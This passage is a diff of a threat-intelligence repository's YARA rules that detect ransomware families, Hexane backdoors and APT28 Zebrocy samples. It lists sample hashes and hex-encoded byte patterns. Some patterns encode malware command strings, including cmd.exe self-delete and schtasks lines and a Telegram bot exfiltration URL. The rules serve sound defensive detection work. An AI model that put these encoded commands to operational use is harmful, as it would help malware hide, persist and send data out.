+		$x4 = { d0 00 8d e5 05 00 53 e3 a0 05 00 1a 00 30 d2 e5 68 00 53 e3 9a 05 00 1a 01 30 d2 e5 74 00 53 e3 94 05 00 1a 02 30 d2 e5 74 00 53 e3 8e 05 00 1a 03 30 d2 e5 70 00 53 e3 88 05 00 1a 04 20 d2 e5 73 00 52 e3 82 05 00 1a 9c 22 9d e5 54 30 92 e5 00 00 53 e3 72 04 00 0a 00 00 51 e3 6a 04 00 1a b4 12 9d e5 b8 32 9d e5 54 70 92 e5 58 07 9f e5 }
+		$x5 = { 55 6e 61 62 6c 65 20 74 6f 20 63 72 65 61 74 65 20 70 69 64 20 66 69 6c 65 20 3a 20 25 76 }
+		$x6 = { 53 61 76 65 20 63 75 72 72 20 50 49 44 20 25 64 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 4 of ( $s* )
+		uint32( 0 ) == 0x464C457F and filesize > 25KB and 3 of ( $s* ) and 2 of ( $x* )
 }
-rule ARKBIRD_SOLG_MAL_Milan_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Crylock_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect Milian backdoor used by Hexane group (aka Siamesekitten)"
+		description = "Detect CryLock ransomware (ex-Cryakl)"
 		author = "Arkbird_SOLG"
-		id = "34acac5a-6090-5a68-9afb-4da7073bed58"
-		date = "2021-08-18"
-		modified = "2021-08-19"
-		reference = "https://www.clearskysec.com/siamesekitten/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-19/Hexane/MAL_Milan_Aug_2021_1.yara#L1-L22"
+		id = "350bd622-f4b5-5837-a239-dc506b100aef"
+		date = "2021-07-17"
+		modified = "2021-07-17"
+		reference = "https://twitter.com/BushidoToken/status/1415958829318217730"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-16/Crylock/RAN_Crylock_July_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "bad8ae2a9275bcb6e0e903fda6a128a1bed676c8e1a8e653e9fc3467766ce7fc"
+		logic_hash = "4f5046a64e7491085a55d8d1f2b5b056dc0aa89fcdea47652ecb7db680de2f59"
 		score = 75
-		quality = 75
+		quality = 65
 		tags = "FILE"
-		hash1 = "b46949feeda8726c0fb86d3cd32d3f3f53f6d2e6e3fcd6f893a76b8b2632b249"
-		hash2 = "4f1b8c9209fa2684aa3777353222ad1c7716910dbb615d96ffc7882eb81dd248"
+		hash1 = "a962501ea4cd363dd588c948ff8b0ab24aa4132ff58f4a7806af06efa3b791ef"
+		hash2 = "1c2975dd464d014502a46ba6383943c7de4635e3664011653217dc424d53f8fe"
+		hash3 = "e001f6a5b2d4d2659b010fb5825eb4383e8f415861a244329bc70cfcd18da507"
 		tlp = "White"
-		adversary = "Hexane"
+		adversary = "RAAS"
 
 	strings:
-		$c1 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 [2-8] 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 64 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 00 20 00 26 00 20 00 77 00 61 00 69 00 74 00 66 00 6f 00 72 00 20 00 61 00 20 00 34 00 20 00 26 00 20 00 63 00 6f 00 70 00 79 00 20 00 22 00 25 00 73 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 20 00 26 00 20 00 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 52 00 75 00 6e 00 20 00 2f 00 54 00 4e 00 20 00 22 }
-		$c2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 [2-8] 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 72 00 6d 00 64 00 69 00 72 00 20 00 2f 00 73 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 00 20 00 26 00 20 00 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 74 00 6e }
-		$s1 = { 2d 2d 2d 2d 2d 2d [1-8] 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f }
-		$s2 = { 5b 00 25 00 64 00 3a 00 25 00 64 00 3a 00 25 00 64 00 3a 00 25 00 64 00 28 00 25 00 64 00 29 00 5d }
-		$s3 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 6d 00 75 00 6c 00 74 00 69 00 70 00 61 00 72 00 74 00 2f 00 66 00 6f 00 72 00 6d 00 2d 00 64 00 61 00 74 00 61 00 3b 00 20 00 62 00 6f 00 75 00 6e 00 64 00 61 00 72 00 79 00 3d 00 2d 00 2d 00 2d 00 2d}
-		$s4 = { 8d 8d 7c ee ff ff 51 6a 00 6a 00 50 ff 15 ?? b2 4b 00 85 c0 0f 84 a9 0f 00 00 8d 85 e0 fb ff ff 50 e8 ?? e0 ff ff 59 50 8d 85 e0 fb ff ff 50 8d 4b 20 e8 [2] 00 00 6a 00 ff b5 94 ee ff ff 8d 85 e0 fb ff ff 50 ff 33 ff 15 ?? b2 4b 00 8b d0 89 95 e8 ee ff ff 85 d2 0f 84 65 0f 00 00 6a 02 5e 33 c9 b8 00 00 80 00 39 b5 88 ee ff ff 0f 44 c8 83 bd 94 ef ff ff 08 51 8d 85 80 ef ff ff 0f 43 85 80 ef ff ff 33 c9 51 51 51 ff b5 a8 ee ff ff 50 52 ff 15 ?? b2 4b 00 8b f0 89 b5 48 ef ff ff 85 f6 0f 84 fb 0e 00 00 80 7b 04 00 8b 3d ?? b2 4b 00 75 23 6a 02 58 39 85 88 ee ff ff 75 18 6a 04 8d 85 20 ef ff ff c7 85 20 ef ff ff 00 31 00 00 50 6a 1f 56 ff d7 c6 85 47 ef ff ff 00 33 c9 c7 85 f0 ee ff ff 18 00 00 00 8b c1 41 89 8d 20 ef ff ff 83 f8 03 0f 83 88 0e 00 00 83 bb d8 00 00 00 00 76 31 8d 83 c8 00 00 00 83 78 14 08 72 02 8b 00 68 00 00 00 01 ff b3 d8 00 00 00 50 56 ff 15 b8 b2 4b 00 85 c0 75 0c ff 15 40 b0 4b 00 89 83 f8 00 00 00 8d b3 a8 00 00 00 83 7e 10 00 76 7a 68 ?? b9 4c 00 8d 8d 98 ef ff ff e8 [2] 00 00 6a ff 33 c0 8d 8d 98 ef ff ff 6a 00 40 56 88 45 fc e8 [2] 00 00 83 bd ac ef ff ff 08 8d 85 98 ef ff ff 8b b5 48 ef ff ff 0f 43 85 98 ef ff ff 68 00 00 00 01 ff b5 a8 ef ff ff 50 56 ff 15 b8 b2 4b 00 85 c0 75 0c ff 15 40 b0 4b 00 89 83 f8 }
-		$s5 = { 6a 00 ff b5 40 ef ff ff ff b3 88 01 00 00 ff 15 30 b0 4b 00 50 57 6a ff 56 8b b5 48 ef ff ff 56 ff 15 ?? b2 4b 00 85 c0 0f 85 b2 02 00 00 8d bd 00 ef ff ff ab ab ab ab 8d 85 00 ef ff ff 50 ff 15 ?? b2 4b 00 85 c0 0f 84 74 02 00 00 8b 95 04 ef ff ff 85 d2 0f 84 4f 01 00 00 33 c0 8d bd b8 ee ff ff 6a 06 59 f3 ab 83 a5 c8 ee ff ff 00 8d bd f4 ee ff ff 83 a5 c4 ee ff ff 00 40 89 85 bc ee ff ff 89 85 cc ee ff ff 33 c0 ab c7 85 b8 ee ff ff 03 00 00 00 89 95 c0 ee ff ff ab ab 8d 43 08 83 }
+		$s1 = { 2f 63 20 22 70 69 6e 67 20 30 2e 30 2e 30 2e 30 26 64 65 6c 20 22 }
+		$s2 = { 7b 45 4e 43 52 59 50 54 53 54 41 52 54 7d 7b }
+		$s3 = { 7b 45 4e 43 52 59 50 54 45 4e 44 45 44 7d }
+		$s4 = { 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 45 58 54 45 4e 41 54 49 4f 4e 53 5c 5c 5c 00 ff ff ff ff 17 00 00 00 2f 2f 2f 45 4e 44 20 43 4f 4d 4d 41 4e 44 53 20 4c 49 53 54 5c 5c 5c 00 ff ff ff ff 1d 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 4b 49 4c 4c 20 4c 49 53 54 5c 5c 5c 00 00 00 ff ff ff ff 1c 00 00 00 2f 2f 2f 45 4e 44 20 53 45 52 56 49 43 45 53 20 53 54 4f 50 20 4c 49 53 54 5c 5c 5c 00 00 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 57 48 49 54 45 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 49 4c 45 53 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 20 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 4f 4c 44 45 52 53 20 4c 49 53 54 5c 5c 5c }
+		$s5 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 }
+		$s6 = { 3c 25 55 4e 44 45 43 52 59 50 54 5f 44 41 54 45 54 49 4d 45 25 3e }
+		$s7 = { 25 00 73 00 20 00 28 00 25 00 73 00 2c 00 20 00 6c 00 69 00 6e 00 65 00 20 00 25 00 64 00 29 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 15KB and 1 of ( $c* ) and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Shark_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Onyxlocker_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Shark backdoor used by Hexane group (aka Siamesekitten)"
+		description = "Detect OnyxLocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "881dcdd9-2f4d-51d3-b046-15cdb2a2cb55"
-		date = "2021-08-18"
-		modified = "2021-08-19"
-		reference = "https://www.clearskysec.com/siamesekitten/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-19/Hexane/MAL_Shark_Aug_2021_1.yara#L1-L24"
+		id = "bb7d914c-a074-5d79-a5d2-43c5a0adf49e"
+		date = "2020-11-18"
+		modified = "2020-11-18"
+		reference = "https://twitter.com/Kangxiaopao/status/1328614320016560128"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-18/OnyxLocker/Ran_OnyxLocker_Nov_2020_1.yar#L1-L27"
 		license_url = "N/A"
-		logic_hash = "c14abb839f4af81a3db38719f23c47498d577a779950e66978ff14d015043490"
+		logic_hash = "1ccca1040acee5bb937fd5ebb3536f8c644d3586229d01457d780bef5fcb57a1"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "89ab99f5721b691e5513f4192e7c96eb0981ddb6c2d2b94c1a32e2df896397b8"
-		hash2 = "f6ae4f4373510c4e096fab84383b547c8997ccf3673c00660df8a3dc9ed1f3ca"
-		hash3 = "44faf11719b3a679e7a6dd5db40033ec4dd6e1b0361c145b81586cb735a64112"
-		hash4 = "2f2ef9e3f6db2146bd277d3c4e94c002ecaf7deaabafe6195fddabc81a8ee76c"
-		tlp = "White"
-		adversary = "Hexane"
+		hash1 = "7e3c97d3d274b5f7fedad6e392e6576ac3e5724ddd7e48c58a654b6b95eb40d7"
 
 	strings:
-		$s1 = { 7b 00 22 00 44 00 61 00 74 00 61 00 22 00 3a 00 5b 00 22 00 00 07 22 00 [0-8] 5d 00 7d }
-		$s2 = "application/json" fullword wide
-		$s3 = { 40 00 45 00 43 00 48 00 4f 00 20 00 4f 00 46 00 46 00 0a 00 00 1d 74 00 61 00 73 00 6b 00 6b 00 69 00 6c 00 6c 00 20 00 2f 00 49 00 4d 00 20 00 22 00 00 17 22 00 20 00 2f 00 46 00 20 00 3e 00 20 00 6e 00 75 00 6c 00 0a 00 00 2b 70 00 69 00 6e 00 67 00 20 00 [12-28] 00 20 00 6e 00 75 00 6c }
-		$s4 = { 2a 00 65 00 78 00 65 00 00 0b 2a 00 70 00 72 00 6f 00 63 00 00 07 2a 00 6b 00 6c 00 00 07 64 00 69 00 72 00 00 11 66 00 69 00 6c 00 65 00 3a 00 2f 00 2f 00 2f }
-		$s5 = { 16 0a 2b 13 02 06 02 06 91 1f 2a 28 ?? 00 00 0a 61 d2 9c 06 17 58 0a 06 02 8e 69 }
-		$s6 = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography" fullword wide
-		$s7 = { 65 00 63 00 68 00 6f 00 20 00 [2-10] 20 00 7c 00 20 00 64 00 65 00 6c 00 20 00 [2-10] 2e 00 62 00 61 00 74 00 00 0f [2-10] 00 2e 00 62 00 61 00 74 }
+		$s1 = "IEncryptionProvider" fullword ascii
+		$s2 = "OnyxLocker.exe" fullword wide
+		$s3 = "GetEncryptionThreads" fullword ascii
+		$s4 = "CreateEncryptionKey" fullword ascii
+		$s5 = ".NETFramework,Version=v4.5.2" fullword ascii
+		$s6 = "get_TargetFiles" fullword ascii
+		$s7 = "IsTargetFile" fullword ascii
+		$s8 = "<TargetFiles>k__BackingField" fullword ascii
+		$s9 = "XxteaEncryptionProvider" fullword ascii
+		$s10 = "GetStartingFolders" fullword ascii
+		$s11 = "<EncryptionKey>k__BackingField" fullword ascii
+		$s12 = "RECOVERY INSTRUCTIONS" fullword wide
+		$s13 = "$182eaa96-fcb2-458b-85cb-a9b8da57ae71" fullword ascii
+		$s14 = ".NET Framework 4.5.2" fullword ascii
+		$s15 = "TraverseDirectories" fullword ascii
+		$s16 = "{0} {1}" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 15KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 8KB and 8 of them
 }
-rule ARKBIRD_SOLG_Ran_Egregor_Sept_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_APT28_VHD_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Egregor ransomware (variant Sept2020)"
+		description = "Detect suspicious VHD file with APT28 artefacts inside (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "b44b93ec-b470-511e-b08f-7d83efd30ecc"
-		date = "2020-10-07"
-		modified = "2020-10-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Egregor_Sept_2020_1.yar#L1-L22"
+		id = "25452eaa-f135-5b7f-a523-67715a2ab9f7"
+		date = "2020-12-09"
+		modified = "2020-12-10"
+		reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L3-L35"
 		license_url = "N/A"
-		logic_hash = "4ce7398cc6ad0538735aec6490204122690f029cbb8d20f9efd2f612955f106b"
-		score = 75
-		quality = 75
+		logic_hash = "d72c3428cf731feb63c59ef109b99ec234e69bb6df34bdde928cc4b886f0533b"
+		score = 50
+		quality = 69
 		tags = "FILE"
-		hash1 = "4c9e3ffda0e663217638e6192a093bbc23cd9ebfbdf6d2fc683f331beaee0321"
-		hash2 = "aee131ba1bfc4b6fa1961a7336e43d667086ebd2c7ff81029e14b2bf47d9f3a7"
-		hash3 = "3fd510a3b2e0b0802d57cd5b1cac1e61797d50a08b87d9b5243becd9e2f7073f"
-		hash4 = "9c900078cc6061fb7ba038ee5c065a45112665f214361d433fc3906bf288e0eb"
-		hash5 = "a376fd507afe8a1b5d377d18436e5701702109ac9d3e7026d19b65a7d313b332"
+		level = "experimental"
+		hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30"
 
 	strings:
-		$x1 = "dmocx.dll" fullword ascii
-		$s2 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
-		$s3 = "M:\\sc\\p\\testbuild.pdb" fullword ascii
-		$s4 = "Type Descriptor'" fullword ascii
-		$s5 = "=$=`=h=p=t=x=|=" fullword ascii
-		$s6 = "--nop" fullword wide
-		$s7 = "9,94989@9X9" fullword ascii
+		$c1 = { 49 6e 76 61 6c 69 64 20 70 61 72 74 69 74 69 6f 6e 20 74 61 62 6c 65 00 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 4d 69 73 73 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 00 00 63 7b }
+		$c2 = { 52 90 4e 54 46 53 }
+		$c3 = { 41 20 64 69 73 6b 20 72 65 61 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 00 0d 0a 42 4f 4f 54 4d 47 52 20 69 73 20 63 6f 6d 70 72 65 73 73 65 64 00 0d 0a 50 72 65 73 73 20 43 74 72 6c 2b 41 6c 74 2b 44 65 6c 20 74 6f 20 72 65 73 74 61 72 74 }
+		$c4 = { 42 00 4f 00 4f 00 54 00 4d 00 47 00 52 00 04 00 24 00 49 00 33 00 30 }
+		$c5 = { 4e 00 54 00 4c 00 44 00 52 00 07 00 42 00 4f 00 4f 00 54 00 54 00 47 00 54 00 07 00 42 00 4f 00 4f 00 54 00 4e 00 58 00 54 }
+		$c6 = { 46 49 4c 45 30 00 03 00 8? ?d }
+		$c7 = { 24 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 60 00 00 00 40 }
+		$s1 = { 46 61 73 74 4d 4d 20 42 6f 72 6c 61 6e 64 20 45 64 69 74 69 6f 6e 20 a9 20 32 30 30 34 2c 20 32 30 30 35 20 50 69 65 72 72 65 20 6c 65 20 52 69 63 68 65 20 2f 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c 20 53 6f 66 74 77 61 72 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 }
+		$s2 = { 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 }
+		$s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c }
+		$s4 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 00 00 6c 61 79 6f 75 74 20 74 65 78 74 }
+		$s5 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 }
+		$s6 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 }
+		$s7 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 00 11 00 53 00 74 00 72 00 65 00 61 00 6d 00 20 00 72 00 65 00 61 00 64 00 20 00 65 00 72 00 72 00 6f 00 72 }
+		$s8 = { 25 73 2c 20 43 6c 61 73 73 49 44 3a 20 25 73 }
+		$s9 = { 43 6f 6e 6e 65 63 74 4b 69 6e 64 b0 10 40 00 44 00 00 ff 44 00 00 ff 01 00 00 00 00 00 00 80 00 00 00 80 04 00 11 52 65 6d 6f 74 65 4d 61 63 68 69 6e 65 4e 61 6d 65 }
+		$s10 = { 22 20 4e 54 2f 20 [1-4] 20 4f 4d 2f 20 45 54 55 4e 49 4d 20 43 53 2f 20 65 74 61 65 72 43 2f 20 73 6b 73 61 74 68 63 73 }
+		$s11 = { 2f 2f 3a 70 74 74 68 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 200KB and 1 of ( $x* ) and 4 of ( $s* )
+		uint16( 0 ) == 0x33c0 and filesize > 40KB and 5 of ( $c* ) and 8 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Crysis_Sep_2020_1 : FILE
+
+rule ARKBIRD_SOLG_APT_APT28_Zebrocy_GO_Downloader_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Crysis ransomware"
+		description = "Detect Zebrocy Go downloader (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "9cc1a1b9-c4a9-5add-833d-81be02ffc4fb"
-		date = "2020-10-16"
-		modified = "2020-10-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Crysis_Sep_2020_1.yar#L1-L23"
+		id = "114c0297-7168-5d20-b56b-89b0b47f18c7"
+		date = "2020-12-09"
+		modified = "2020-12-10"
+		reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L37-L65"
 		license_url = "N/A"
-		logic_hash = "c7706b862cd0277c8b726d32dc819ad7e15933b28e3a31599922f3dc0beb8348"
-		score = 75
-		quality = 69
+		logic_hash = "e7b2e7c250f3a98127399176adf9f93b758f0a5111e126dd0a75a3fb95a48da9"
+		score = 50
+		quality = 61
 		tags = "FILE"
-		hash1 = "34c485ad11076ede709ff409c0e1867dc50fd40311ae6e7318ddf50679fa4049"
-		hash2 = "4708750c9a6fdeaec5f499a3cd26bb5f61db4f82e66484dc7b44118effbb246f"
-		hash3 = "b565c8e1e81796db13409f37e4bd28877272b5e54ab5c0a3d9b6a024e7f5a039"
-		hash4 = "8e8b6818423930eea073315743b788aef2f41198961946046b7b89042cb3f95a"
+		level = "experimental"
+		hash1 = "61c2e524dcc25a59d7f2fe7eff269865a3ed14d6b40e4fea33b3cd3f58c14f19"
+		hash2 = "f36a0ee7f4ec23765bb28fbfa734e402042278864e246a54b8c4db6f58275662"
 
 	strings:
-		$s1 = { 6f 25 25 4a 72 2e 2e 5c 24 }
-		$s2 = { 52 53 44 53 25 7e 6d }
-		$s3 = { 78 78 4a 6f 25 25 5c 72 2e 2e 38 24 }
-		$s4 = { 25 65 65 ca af 7a 7a f4 8e ae ae 47 e9 08 08 10 18 ba ba }
-		$s5 = { 58 74 1a 1a 34 2e 1b 1b 36 2d 6e 6e dc b2 5a 5a b4 ee a0 a0 5b fb 52 52 a4 f6 3b 3b 76 4d d6 d6 b7 61 b3 b3 7d ce 29 29 52 7b e3 e3 dd 3e 2f 2f 5e 71 84 84 13 97 53 53 }
-		$s6 = { 3b 32 32 64 56 3a 3a 74 4e 0a 0a 14 1e 49 49 92 db 06 06 0c 0a 24 24 48 6c 5c 5c b8 e4 c2 c2 9f 5d d3 d3 bd 6e ac ac 43 ef 62 62 }
-		$s7 = { 26 4c 6a 26 36 6c 5a 36 3f 7e 41 3f f7 f5 02 f7 cc 83 4f cc 34 68 5c 34 a5 51 f4 a5 e5 d1 34 e5 f1 f9 08 f1 71 e2 93 71 d8 ab 73 d8 31 62 53 31 15 2a 3f 15 04 08 0c 04 c7 95 52 c7 23 46 65 23 }
-		$s8 = { 7e fc 82 7e 3d 7a 47 3d 64 c8 ac 64 5d ba e7 5d 19 32 2b 19 73 e6 95 73 60 c0 a0 60 81 19 98 81 4f 9e d1 4f dc a3 7f dc 22 44 66 22 2a 54 7e 2a 90 3b ab 90 88 0b 83 88 46 8c ca 46 ee c7 29 }
-		$s9 = "sssssbsss" fullword ascii
+		$c1 = "os.(*ProcessState).sys" fullword ascii
+		$c2 = "os/exec.(*ExitError).Sys" fullword ascii
+		$c3 = "os/exec.ExitError.Sys" fullword ascii
+		$c4 = "os.(*ProcessState).Sys" fullword ascii
+		$p1 = "syscall.CreatePipe" fullword ascii
+		$p2 = "os.Pipe" fullword ascii
+		$p3 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 70 69 70 65 29 2e 63 6c 6f 73 65 44 6f 6e 65 4c 6f 63 6b 65 64 }
+		$p4 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 63 6c 69 65 6e 74 53 74 72 65 61 6d 29 2e 67 65 74 53 74 61 72 74 65 64 57 72 69 74 65 }
+		$op1 = { 75 5f 67 3d 25 73 20 25 71 25 73 2a 25 64 25 73 3d 25 73 26 23 33 34 3b 26 23 33 39 3b 26 61 6d 70 3b }
+		$op2 = { 70 63 3d 25 21 28 4e 4f 56 45 52 42 29 25 21 57 65 65 6b 64 61 79 28 25 73 7c 25 73 25 73 7c 25 73 28 42 41 44 49 4e 44 45 58 29 }
+		$op3 = { 48 54 54 50 5f 50 52 4f 58 59 48 6f 73 74 3a 20 25 73 0d 0a 49 50 20 61 64 64 72 65 73 73 4b 65 65 70 2d 41 6c 69 76 65 }
+		$op4 = { 63 6f 6e 6e 65 63 74 69 6f 6e 20 65 72 72 6f 72 3a 20 25 73 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 69 6d 65 64 20 6f 75 74 }
+		$op5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d }
+		$op6 = { 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and all of them
+		uint16( 0 ) == 0x4d5a and filesize > 800KB and ( pe.imphash ( ) == "91802a615b3a5c4bcc05bc5f66a5b219" ) and 3 of ( $c* ) and 3 of ( $p* ) and 3 of ( $op* )
 }
-rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_2 : FILE
+rule ARKBIRD_SOLG_Ran_ELF_EXX_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect the DarkRadiation ransomware"
+		description = "Detect EXX variant ELF ransomware"
 		author = "Arkbird_SOLG"
-		id = "3580a41a-ba2e-5a47-b35d-b2482fbc913a"
-		date = "2021-07-03"
-		modified = "2021-07-05"
-		reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_2.yara#L1-L27"
+		id = "fe85d480-317a-51c3-a817-fc9034e2944f"
+		date = "2020-12-09"
+		modified = "2020-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/EXX/Ran_ELF_EXX_Nov_2020_1.yar#L1-L28"
 		license_url = "N/A"
-		logic_hash = "b21db1658845cafe37950d69b5bc0aab203e7bea3e43f95394236e0133234e2d"
-		score = 75
-		quality = 57
+		logic_hash = "4508a0cf79d0d85959009f59e1471cbf123fa24f5c21da5801e91ed0bbe8a085"
+		score = 50
+		quality = 73
 		tags = "FILE"
-		hash1 = "3bab2947305c00df66cb4d6aaef006f10aca348c17aa2fd28e53363a08b7ec68"
-		hash2 = "652ee7b470c393c1de1dfdcd8cb834ff0dd23c93646739f1f475f71a6c138edd"
-		hash3 = "79aee7a4459d49dc6dfebf1a45d32ccc3769a1e5c1f231777ced3769607ba9c1"
-		tlp = "White"
-		adversary = "FERRUM"
+		level = "experimental"
+		hash1 = "cb408d45762a628872fa782109e8fcfc3a5bf456074b007de21e9331bb3c5849"
 
 	strings:
-		$s1 = { 61 6c 6c 54 68 72 65 61 64 73 3d 28 24 31 29 }
-		$s2 = { 4d 53 47 5f 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 27 24 54 4f 4b 45 4e 27 2f 73 65 6e 64 4d 65 73 73 61 67 65 3f 63 68 61 74 5f 69 64 3d 27 }
